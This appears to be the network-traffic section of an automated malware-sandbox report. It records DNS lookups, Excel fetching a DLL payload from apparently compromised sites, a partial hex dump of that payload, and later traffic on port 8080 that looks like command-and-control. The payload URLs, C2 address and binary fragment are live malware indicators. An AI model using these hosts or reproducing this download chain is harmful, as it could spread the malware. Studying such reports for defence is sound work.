                                                May 23, 2022 08:35:01.230511904 CEST44349176159.203.19.2192.168.2.22
                                                May 23, 2022 08:35:01.867171049 CEST8049175160.153.40.1192.168.2.22
                                                May 23, 2022 08:35:01.867253065 CEST4917580192.168.2.22160.153.40.1
                                                May 23, 2022 08:35:03.772452116 CEST4917780192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:03.814680099 CEST8049177193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:03.814779997 CEST4917780192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:03.818012953 CEST4917780192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:03.860912085 CEST8049177193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:05.960398912 CEST8049177193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:05.960510015 CEST4917780192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:06.023686886 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:06.064675093 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:06.064800978 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:06.065642118 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:06.106549978 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.104851961 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.104918003 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.104959011 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.104996920 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.105031967 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.105036974 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.105066061 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.105076075 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.105081081 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.105107069 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.105120897 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.105159998 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.105171919 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.105200052 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.105212927 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.105223894 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.105238914 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.105295897 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.105984926 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.112268925 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.112314939 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146222115 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146271944 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146297932 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146318913 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146325111 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146353006 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146358013 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146378040 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146389008 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146399021 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146404028 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146404982 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146437883 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146440983 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146466970 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146470070 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146498919 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146500111 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146524906 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146539927 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146550894 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146555901 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146578074 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146594048 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146605968 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146620035 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146631956 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146639109 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146666050 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146670103 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146692038 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146703959 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146720886 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146727085 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146764994 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146787882 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146837950 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.146902084 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.146944046 CEST8049178193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.147006035 CEST4917880192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:07.963172913 CEST8049177193.143.77.34192.168.2.22
                                                May 23, 2022 08:35:07.963320971 CEST4917780192.168.2.22193.143.77.34
                                                May 23, 2022 08:35:25.115195990 CEST491798080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:25.288558960 CEST808049179173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:25.288759947 CEST491798080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:25.377157927 CEST491798080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:25.550851107 CEST808049179173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:25.568670988 CEST808049179173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:25.568707943 CEST808049179173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:25.568747044 CEST491798080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:25.568778038 CEST491798080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:25.577109098 CEST491798080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:25.750900030 CEST808049179173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:25.761835098 CEST808049179173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:25.765253067 CEST491798080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:28.630650997 CEST491818080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:28.806726933 CEST808049181173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:28.807483912 CEST491818080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:28.898829937 CEST491818080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:28.920202017 CEST491828080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:29.056583881 CEST491798080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:29.072526932 CEST808049181173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:29.087687016 CEST808049181173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:29.087708950 CEST808049181173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:29.087817907 CEST491818080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:29.095516920 CEST808049182173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:29.095618010 CEST491828080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:29.099281073 CEST491818080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:29.174777031 CEST491828080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:29.230361938 CEST808049179173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:29.273575068 CEST808049181173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:29.277178049 CEST808049181173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:29.277256012 CEST491818080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:29.349951982 CEST808049182173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:29.366401911 CEST808049182173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:29.366430998 CEST808049182173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:29.366539955 CEST491828080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:29.376513958 CEST491828080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:29.551987886 CEST808049182173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:29.555772066 CEST808049182173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:29.555866957 CEST491828080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:29.902724028 CEST808049179173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:29.903845072 CEST491798080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:30.002789021 CEST491818080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:30.176261902 CEST808049181173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:30.597209930 CEST491828080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:30.771990061 CEST808049182173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:30.856652021 CEST808049181173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:30.856759071 CEST491818080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:31.471823931 CEST808049182173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:31.472343922 CEST491828080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:32.902920961 CEST808049179173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:32.902988911 CEST808049179173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:32.903062105 CEST491798080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:32.903101921 CEST491798080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:33.856266022 CEST808049181173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:33.856306076 CEST808049181173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:33.856416941 CEST491818080192.168.2.22173.82.82.196
                                                May 23, 2022 08:35:34.471364021 CEST808049182173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:34.471390963 CEST808049182173.82.82.196192.168.2.22
                                                May 23, 2022 08:35:34.471546888 CEST491828080192.168.2.22173.82.82.196
                                                May 23, 2022 08:36:51.649152040 CEST4917780192.168.2.22193.143.77.34
                                                May 23, 2022 08:36:51.649364948 CEST4917580192.168.2.22160.153.40.1
                                                May 23, 2022 08:36:51.649568081 CEST4917380192.168.2.22188.114.97.10
                                                May 23, 2022 08:36:51.666507006 CEST8049173188.114.97.10192.168.2.22
                                                May 23, 2022 08:36:51.666599989 CEST4917380192.168.2.22188.114.97.10
                                                May 23, 2022 08:36:51.944590092 CEST4917780192.168.2.22193.143.77.34
                                                May 23, 2022 08:36:52.053869963 CEST4917580192.168.2.22160.153.40.1
                                                May 23, 2022 08:36:52.553179026 CEST4917780192.168.2.22193.143.77.34
                                                May 23, 2022 08:36:52.865226030 CEST4917580192.168.2.22160.153.40.1
                                                May 23, 2022 08:36:53.832389116 CEST4917780192.168.2.22193.143.77.34
                                                May 23, 2022 08:36:54.472131014 CEST4917580192.168.2.22160.153.40.1
                                                May 23, 2022 08:36:56.250649929 CEST4917780192.168.2.22193.143.77.34
                                                May 23, 2022 08:36:57.748322964 CEST4917580192.168.2.22160.153.40.1
                                                May 23, 2022 08:37:01.055830956 CEST4917780192.168.2.22193.143.77.34
                                                May 23, 2022 08:37:04.176211119 CEST4917580192.168.2.22160.153.40.1
                                                May 23, 2022 08:37:10.666273117 CEST4917780192.168.2.22193.143.77.34
                                                May 23, 2022 08:37:15.274595022 CEST491798080192.168.2.22173.82.82.196
                                                May 23, 2022 08:37:15.274641037 CEST491798080192.168.2.22173.82.82.196
                                                May 23, 2022 08:37:17.047224998 CEST4917580192.168.2.22160.153.40.1
                                                TimestampSource PortDest PortSource IPDest IP
                                                May 23, 2022 08:34:51.792490959 CEST5586853192.168.2.228.8.8.8
                                                May 23, 2022 08:34:51.812971115 CEST53558688.8.8.8192.168.2.22
                                                May 23, 2022 08:34:55.703608990 CEST4968853192.168.2.228.8.8.8
                                                May 23, 2022 08:34:55.724946022 CEST53496888.8.8.8192.168.2.22
                                                May 23, 2022 08:34:59.931207895 CEST5883653192.168.2.228.8.8.8
                                                May 23, 2022 08:34:59.950536013 CEST53588368.8.8.8192.168.2.22
                                                May 23, 2022 08:35:03.752105951 CEST5013453192.168.2.228.8.8.8
                                                May 23, 2022 08:35:03.769732952 CEST53501348.8.8.8192.168.2.22
                                                May 23, 2022 08:35:05.974170923 CEST5527553192.168.2.228.8.8.8
                                                May 23, 2022 08:35:06.022006035 CEST53552758.8.8.8192.168.2.22
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                May 23, 2022 08:34:51.792490959 CEST192.168.2.228.8.8.80x1f72Standard query (0)vipteck.comA (IP address)IN (0x0001)
                                                May 23, 2022 08:34:55.703608990 CEST192.168.2.228.8.8.80x718eStandard query (0)salledemode.comA (IP address)IN (0x0001)
                                                May 23, 2022 08:34:59.931207895 CEST192.168.2.228.8.8.80x8c4Standard query (0)airliftlimo.comA (IP address)IN (0x0001)
                                                May 23, 2022 08:35:03.752105951 CEST192.168.2.228.8.8.80xa104Standard query (0)kabeonet.plA (IP address)IN (0x0001)
                                                May 23, 2022 08:35:05.974170923 CEST192.168.2.228.8.8.80x9d03Standard query (0)www.kabeonet.plA (IP address)IN (0x0001)
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                May 23, 2022 08:34:51.812971115 CEST8.8.8.8192.168.2.220x1f72No error (0)vipteck.com188.114.97.10A (IP address)IN (0x0001)
                                                May 23, 2022 08:34:51.812971115 CEST8.8.8.8192.168.2.220x1f72No error (0)vipteck.com188.114.96.10A (IP address)IN (0x0001)
                                                May 23, 2022 08:34:55.724946022 CEST8.8.8.8192.168.2.220x718eNo error (0)salledemode.com160.153.40.1A (IP address)IN (0x0001)
                                                May 23, 2022 08:34:59.950536013 CEST8.8.8.8192.168.2.220x8c4No error (0)airliftlimo.com159.203.19.2A (IP address)IN (0x0001)
                                                May 23, 2022 08:35:03.769732952 CEST8.8.8.8192.168.2.220xa104No error (0)kabeonet.pl193.143.77.34A (IP address)IN (0x0001)
                                                May 23, 2022 08:35:06.022006035 CEST8.8.8.8192.168.2.220x9d03No error (0)www.kabeonet.plkabeonet.plCNAME (Canonical name)IN (0x0001)
                                                May 23, 2022 08:35:06.022006035 CEST8.8.8.8192.168.2.220x9d03No error (0)kabeonet.pl193.143.77.34A (IP address)IN (0x0001)
                                                May 23, 2022 08:35:26.618551016 CEST8.8.8.8192.168.2.220xc77eNo error (0)windowsupdatebg.s.llnwi.net178.79.242.0A (IP address)IN (0x0001)
                                                • vipteck.com
                                                • airliftlimo.com
                                                • salledemode.com
                                                • kabeonet.pl
                                                • www.kabeonet.pl
                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.2249174188.114.97.10443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.2249176159.203.19.2443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.2249173188.114.97.1080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                TimestampkBytes transferredDirectionData
                                                May 23, 2022 08:34:51.849772930 CEST2OUTGET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1
                                                Accept: */*
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: vipteck.com
                                                Connection: Keep-Alive
                                                May 23, 2022 08:34:51.880934954 CEST3INHTTP/1.1 301 Moved Permanently
                                                Date: Mon, 23 May 2022 06:34:51 GMT
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Cache-Control: max-age=3600
                                                Expires: Mon, 23 May 2022 07:34:51 GMT
                                                Location: https://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nl892dnyKOFzSxOmMrYP2rKakrwvBi8ZQT9cpNW6JG6sjmZFL7rH47bxIziI5Ya5jOZhd%2Fi7U5Fhc95rL3vNYqCX0CTZrwZ5eFn6arMhJpgrHE50at5rpuphATZ%2BHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Vary: Accept-Encoding
                                                Server: cloudflare
                                                CF-RAY: 70fbc4aa1cee91d1-FRA
                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.2249175160.153.40.180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                TimestampkBytes transferredDirectionData
                                                May 23, 2022 08:34:55.892431021 CEST392OUTGET /tgroup.ge/x4bc2kL4BzGAeUsVi/ HTTP/1.1
                                                Accept: */*
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: salledemode.com
                                                Connection: Keep-Alive
                                                May 23, 2022 08:34:56.077950954 CEST394INHTTP/1.1 200 OK
                                                Date: Mon, 23 May 2022 06:34:55 GMT
                                                Server: Apache
                                                X-Powered-By: PHP/7.2.34
                                                Cache-Control: no-cache, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 23 May 2022 06:34:55 GMT
                                                Content-Disposition: attachment; filename="me435CErJsFGw1q.dll"
                                                Content-Transfer-Encoding: binary
                                                Set-Cookie: 628b2b0ff1266=1653287695; expires=Mon, 23-May-2022 06:35:55 GMT; Max-Age=60; path=/
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, Keep-Alive
                                                Last-Modified: Mon, 23 May 2022 06:34:55 GMT
                                                Content-Length: 365056
                                                Vary: Accept-Encoding
                                                Strict-Transport-Security: max-age=300
                                                Keep-Alive: timeout=5
                                                Content-Type: application/x-msdownload
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b" 5T@P .text `.rdataT @@.data7@.pdata@@.rsrc@@.
                                                May 23, 2022 08:34:56.077990055 CEST395INData Raw: 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Data Ascii: reloc@B
                                                May 23, 2022 08:34:56.078013897 CEST396INData Raw: 45 b0 f0 2d 7c 7e c7 45 b4 ec 2a 26 1a c7 45 b8 48 44 66 9d c7 45 bc 14 7c 50 76 c7 45 c0 2f 35 b6 2f c7 45 c4 72 6b 45 40 c7 45 c8 67 bf 2f 7b c7 45 cc 6d 62 50 76 c7 45 d0 98 20 2b 59 c7 45 d4 3c 09 64 ac c7 45 d8 e2 4d 20 7a c7 45 dc 24 06 55
                                                Data Ascii: E-|~E*&EHDfE|PvE/5/ErkE@Eg/{EmbPvE +YE<dEM zE$UENbE0kj.ExiyE:!@E=MEBXE6E;#tEIE<*1E#\VE"uEAwEYPE"wEV!E .aE$"a/E(:S9E,TE0<E4mE8_
                                                May 23, 2022 08:34:56.078099012 CEST398INData Raw: 00 0e 75 4c f2 c7 85 08 02 00 00 33 e3 40 03 c7 85 0c 02 00 00 09 03 3e 82 c7 85 10 02 00 00 37 c3 2f 6a c7 85 14 02 00 00 a4 07 46 6c c7 85 18 02 00 00 3a 30 04 53 c7 85 1c 02 00 00 f2 78 41 38 c7 85 20 02 00 00 39 02 16 4e c7 85 24 02 00 00 bd
                                                Data Ascii: uL3@>7/jFl:0SxA8 9N$`qY(Ye,N0:y4b%8<>N@o;ED(7Hp PL5P6CT& X2{\ePO`/CdT
                                                May 23, 2022 08:34:56.078142881 CEST399INData Raw: 04 00 00 24 45 23 bf c7 85 20 04 00 00 a9 50 d2 78 c7 85 24 04 00 00 21 b9 a5 10 c7 85 28 04 00 00 43 2f e6 e0 c7 85 2c 04 00 00 5e 60 de e9 c7 85 30 04 00 00 23 28 a7 8b c7 85 34 04 00 00 1f 35 ee b8 c7 85 38 04 00 00 2b 4f b7 5c c7 85 3c 04 00
                                                Data Ascii: $E# Px$!(C/,^`0#(458+O\<pu@&\hRD_lHbL+qP>TjfXX\Cb`42dq?h4%llpsoKt#xi|
                                                May 23, 2022 08:34:56.078171015 CEST400INData Raw: 85 34 06 00 00 7b 24 55 7c c7 85 38 06 00 00 e0 fc 2d 85 c7 85 3c 06 00 00 95 45 1e 27 c7 85 40 06 00 00 d5 80 7d 42 c7 85 44 06 00 00 21 77 55 92 c7 85 48 06 00 00 65 d4 b4 28 c7 85 4c 06 00 00 73 9a 42 99 c7 85 50 06 00 00 d7 2b 4b 2a c7 85 54
                                                Data Ascii: 4{$U|8-<E'@}BD!wUHe(LsBP+K*T.lX5\`Tg9doEhulCepd$t"aVx#d|?N3]='O5[(;.,
                                                May 23, 2022 08:34:56.078197956 CEST402INData Raw: 95 c7 85 4c 08 00 00 31 76 66 08 c7 85 50 08 00 00 a9 28 45 21 c7 85 54 08 00 00 5b a0 6e e2 c7 85 58 08 00 00 46 4c 49 6e c7 85 5c 08 00 00 5f 24 bd 63 c7 85 60 08 00 00 b1 d1 43 35 c7 85 64 08 00 00 71 e1 68 d3 c7 85 68 08 00 00 94 b3 8d 66 c7
                                                Data Ascii: L1vfP(E!T[nXFLIn\_$c`C5dqhhflApxt#$xGz|Q[nsmKa?<J(+y@p3zm
                                                May 23, 2022 08:34:56.078226089 CEST403INData Raw: 6b 90 62 c7 85 64 0a 00 00 eb 25 55 63 c7 85 68 0a 00 00 8b 75 0b ca c7 85 6c 0a 00 00 b2 2b a7 93 c7 85 70 0a 00 00 48 36 64 a0 c7 85 74 0a 00 00 ea 18 bc 62 c7 85 78 0a 00 00 41 9b 1e e8 c7 85 7c 0a 00 00 33 26 07 a3 c7 85 80 0a 00 00 10 66 98
                                                Data Ascii: kbd%Uchul+pH6dtbxA|3&fH!`AnMK3*l?xuOKx(7&).Rtp9:|e:NKf
                                                May 23, 2022 08:34:56.078432083 CEST405INData Raw: 89 51 f0 48 89 51 f8 75 d8 eb 94 66 0f 1f 44 00 00 48 0f c3 11 48 0f c3 51 08 48 0f c3 51 10 48 83 c1 40 48 0f c3 51 d8 48 0f c3 51 e0 49 ff c9 48 0f c3 51 e8 48 0f c3 51 f0 48 0f c3 51 f8 75 d0 f0 80 0c 24 00 e9 54 ff ff ff cc cc cc cc cc cc 4c
                                                Data Ascii: QHQufDHHQHQH@HQHQIHQHQHQu$TLD$T$HL$HH|$XTu3^uT3SkHwRH;B}T3\!L|I|3;tH
                                                May 23, 2022 08:34:56.078459024 CEST406INData Raw: 00 00 48 8b 84 24 c8 00 00 00 48 8b 40 08 48 89 44 24 78 48 8b 84 24 c8 00 00 00 48 8b 4c 24 78 48 8b 00 48 2b c1 48 89 44 24 68 48 8b 84 24 c8 00 00 00 48 8b 40 38 48 89 84 24 88 00 00 00 48 8b 84 24 b0 00 00 00 8b 40 04 83 e0 66 85 c0 0f 85 04
                                                Data Ascii: H$H@HD$xH$HL$xHH+HD$hH$H@8H$H$@fH$HD$8H$HD$@H$@HD$0D$0D$0H$9D$0D$0HkH$DH9D$hD$0HkH$DH9D$hsD$0HkH$|
                                                May 23, 2022 08:34:56.234586000 CEST408INData Raw: d2 48 8b 4c 24 30 e8 62 00 00 00 ff 15 74 e2 01 00 48 8b 4c 24 30 89 01 48 8b 44 24 30 48 c7 40 08 ff ff ff ff b8 01 00 00 00 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 83 3d 25 72 02 00 ff 74 16 8b 0d 1d 72 02 00 ff 15
                                                Data Ascii: HL$0btHL$0HD$0H@HHH(=%rtrrRH(HT$HL$H(HD$0HHHD$0@HD$0@HD$0HD$0tCHD$0CHD$0HxHSTHD$0H


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.2249177193.143.77.3480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                TimestampkBytes transferredDirectionData
                                                May 23, 2022 08:35:03.818012953 CEST1169OUTGET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1
                                                Accept: */*
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: kabeonet.pl
